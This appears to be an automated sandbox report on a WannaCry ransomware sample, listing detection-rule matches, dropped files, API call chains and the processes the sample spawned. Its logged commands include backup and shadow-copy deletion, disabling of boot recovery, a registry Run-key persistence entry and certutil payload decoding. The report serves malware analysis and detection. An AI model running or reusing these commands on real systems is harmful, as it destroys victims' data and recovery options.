                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,28_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,28_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 28_2_004046F0 CryptImportKey,28_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,37_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,37_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Code function: 37_2_004046F0 CryptImportKey,37_2_004046F0

                  System Summary

                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 49.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 49.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 52.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 52.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 37.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 43.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 28.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 28.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: C:\@Please_Read_Me@.txt, type: DROPPED Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPED Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\@WanaDecryptor@.exe, type: DROPPED Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPED Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\198851684139341.bat, type: DROPPED Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth (Nextron Systems)
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED Matched rule: Detects WannaCry Ransomware Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                  Source: 25.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 37.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 43.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 49.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 49.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 52.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 52.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 37.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 25.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 43.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 28.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 46.2.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 28.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE, Matched rule: WannaCry_Ransomware, date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: 5.0.WannaCrypt0r.sk.400000.0.unpack, type: UNPACKEDPE, Matched rule: wanna_cry_ransomware_generic, date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic, date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: 00000004.00000002.2989666418.000001846CCE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Certutil_Decode_OR_Download, author = Florian Roth (Nextron Systems), description = Certutil Decode, score = 2017-08-29, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY, Matched rule: wanna_cry_ransomware_generic, date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: C:\@Please_Read_Me@.txt, type: DROPPED, Matched rule: WannaCry_RansomNote, date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\WANNACRY.bin, type: DROPPED, Matched rule: SUSP_certificate_payload, date = 2018/08/02, author = Didier Stevens, Florian Roth, description = Detects payloads that pretend to be certificates, score = , reference = https://blog.nviso.be/2018/08/02/powershell-inside-a-certificate-part-3/
                  Source: C:\Users\user\Desktop\u.wnry, type: DROPPED, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\@WanaDecryptor@.exe, type: DROPPED, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\Users\user\Desktop\r.wnry, type: DROPPED, Matched rule: WannaCry_RansomNote, date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\198851684139341.bat, type: DROPPED, Matched rule: WannCry_BAT, date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED, Matched rule: WannaCry_Ransomware, date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED, Matched rule: Win32_Ransomware_WannaCry, tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, type: DROPPED, Matched rule: wanna_cry_ransomware_generic, date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
                  Source: WannaCrypt0r.sk.4.dr, Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
                  Source: taskdl.exe.5.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: C:\Windows\System32\msg.exe, Section loaded: edgegdi.dll
                  Source: C:\Windows\System32\certutil.exe, Section loaded: edgegdi.dll
                  Source: C:\Windows\SysWOW64\cscript.exe, Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exe, Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe, Section loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe, Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe, Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe, Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exe, Section loaded: edgegdi.dll
                  Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe, Section loaded: edgegdi.dll
                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: libevent_core-2-0-5.dll.25.dr, Static PE information: Number of sections : 17 > 10
                  Source: libevent-2-0-5.dll.25.dr, Static PE information: Number of sections : 17 > 10
                  Source: ssleay32.dll.25.dr, Static PE information: Number of sections : 18 > 10
                  Source: libeay32.dll.25.dr, Static PE information: Number of sections : 18 > 10
                  Source: libgcc_s_sjlj-1.dll.25.dr, Static PE information: Number of sections : 17 > 10
                  Source: libevent_extra-2-0-5.dll.25.dr, Static PE information: Number of sections : 17 > 10
                  Source: libssp-0.dll.25.dr, Static PE information: Number of sections : 17 > 10
                  Source: WannaCry.cmd, Virustotal: Detection: 25%
                  Source: C:\Windows\System32\msg.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\taskse.exe, Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_36-120
                  Source: C:\Users\user\Desktop\taskdl.exe, Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-217
                  Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WannaCry.cmd" "
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\certutil.exe certutil -decode "WANNACRY.bin" "WannaCrypt0r.sk"
                  Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\user\Desktop\WannaCrypt0r.sk WannaCrypt0r.sk
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\SysWOW64\attrib.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\icacls.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 198851684139341.bat
                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
                  Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 36_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,36_2_00401000
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 36_2_00401398 Sleep,AdjustTokenPrivileges,36_2_00401398
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\WANNACRY.bin
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Adobe\Temp\~SDDFC8.tmp
                  Source: classification engineClassification label: mal100.rans.spyw.evad.winCMD@51/842@0/4
                  Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403A20 GetLogicalDrives,GetDriveTypeW,GetDriveTypeW,GetDiskFreeSpaceExW,25_2_00403A20
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:868:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:868:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                  Source: WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
                  Source: WannaCrypt0r.sk, 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWindow found: window name: RICHEDIT
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLL
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: WannaCry.cmdStatic file information: File size 6223568 > 1048576
                  Source: Binary string: tC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbileson Data\Appl source: WannaCrypt0r.sk, 00000005.00000003.3701556589.000000000374D000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3741172069.000000000374E000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3699237993.0000000003743000.00000004.00000020.00020000.00000000.sdmp
